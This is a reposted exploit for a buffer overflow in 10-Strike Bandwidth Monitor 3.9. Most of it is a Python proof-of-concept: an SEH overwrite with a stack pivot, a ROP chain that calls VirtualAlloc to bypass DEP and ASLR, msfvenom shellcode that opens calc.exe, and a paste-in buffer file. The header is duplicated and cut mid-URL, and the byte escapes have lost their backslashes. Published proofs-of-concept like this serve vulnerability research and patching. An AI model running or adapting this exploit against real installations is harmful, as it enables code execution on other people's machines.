10-Strike Bandwidth Monitor 3.9 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 422

# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-s # Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
# 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
# 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
# 5. Pass execution to shellcode and PopCalc.
# - Bad Characters: x00 => x20 ; x0D & x0A => Truncates buffer
# Recreate:
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit

# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------

import struct
OS_retSled = 'x41'*400
retSled = 'x24x01x06x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}

# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc

# 0014EAA0 110495EF .... LIBEAY32.110495EF
# 0014EAA4 1202EF02 .... /CALL to VirtualAlloc
# 0014EAA8 0014EABC .... |Address = 0014EABC
# 0014EAAC 00000001 .... |Size = 1
# 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT
# 0014EAB4 00000040 @... Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc>
# 0014EABC 110843B4 .C.. LIBEAY32.110843B4
# 0014EAC0 90909090 ....

def createRopChain():
# rop chain generated with mona.py - www.corelan.be
ropGadgets = [
0x1202ef02, # POP EBP # RETN [ssleay32.dll]
0x1202ef02, # skip 4 bytes [ssleay32.dll]
0x01215f16, # POP EBX # RETN [BandMonitor.exe]
0xffffffff, #
0x012175f5, # INC EBX # RETN [BandMonitor.exe]
0x01056ff7, # INC EBX # RETN [BandMonitor.exe]
0x011e94d4, # POP EDX # RETN [BandMonitor.exe]
0xffffefff, # Value to negate, destination value : 0x00001000
0x01218952, # NEG EDX # RETN [BandMonitor.exe]
0x011ead1b, # DEC EDX # RETN [BandMonitor.exe]
0x110c5b5e, # POP ECX # RETN [LIBEAY32.dll]
0xffffffff, #
0x11016023, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1202fe55, # POP EDI # RETN [ssleay32.dll]
0x01225803, # RETN (ROP NOP) [BandMonitor.exe]
0x1105ed16, # POP ESI # RETN [LIBEAY32.dll]
0x110495ef, # JMP [EAX] [LIBEAY32.dll]
0x012126f5, # POP EAX # RETN [BandMonitor.exe]
0x110e7198, # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
0x110762c4, # PUSHAD # RETN [LIBEAY32.dll]
0x110843b4, # ptr to 'push esp # ret ' [LIBEAY32.dll]
]
return ''.join(struct.pack('<I', _) for _ in ropGadgets)
ropChain = createRopChain()
nopSled = 'x90'*100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b 'x00x0dx0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"xbfxd2xa1xc4xd3xdaxdbxd9x74x24xf4"
shellcode += b"x5ex31xc9xb1x31x83xc6x04x31x7ex0f"
shellcode += b"x03x7exddx43x31x2fx09x01xbaxd0xc9"
shellcode += b"x66x32x35xf8xa6x20x3dxaax16x22x13"
shellcode += b"x46xdcx66x80xddx90xaexa7x56x1ex89"
shellcode += b"x86x67x33xe9x89xebx4ex3ex6axd2x80"
shellcode += b"x33x6bx13xfcxbex39xccx8ax6dxaex79"
shellcode += b"xc6xadx45x31xc6xb5xbax81xe9x94x6c"
shellcode += b"x9axb3x36x8ex4fxc8x7ex88x8cxf5xc9"
shellcode += b"x23x66x81xcbxe5xb7x6ax67xc8x78x99"
shellcode += b"x79x0cxbex42x0cx64xbdxffx17xb3xbc"
shellcode += b"xdbx92x20x66xafx05x8dx97x7cxd3x46"
shellcode += b"x9bxc9x97x01xbfxccx74x3axbbx45x7b"
shellcode += b"xedx4ax1dx58x29x17xc5xc1x68xfdxa8"
shellcode += b"xfex6bx5ex14x5bxe7x72x41xd6xaax18"
shellcode += b"x94x64xd1x6ex96x76xdaxdexffx47x51"
shellcode += b"xb1x78x58xb0xf6x77x12x99x5ex10xfb"
shellcode += b"x4bxe3x7dxfcxa1x27x78x7fx40xd7x7f"
shellcode += b"x9fx21xd2xc4x27xd9xaex55xc2xddx1d"
shellcode += b"x55xc7xbdxc0xc5x8bx6fx67x6ex29x70"

OS_nSEH = 'x43'*(4188-600-200-len(ropChain+nopSled+shellcode))
nSEH = 'x44'*4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH = 'x70x28x21x01' # 0x01212870 : {pivot 2064 / 0x810}
extra = 'x44'*2000
buffer = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File = 'poc.txt'
try:
payload = buffer
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'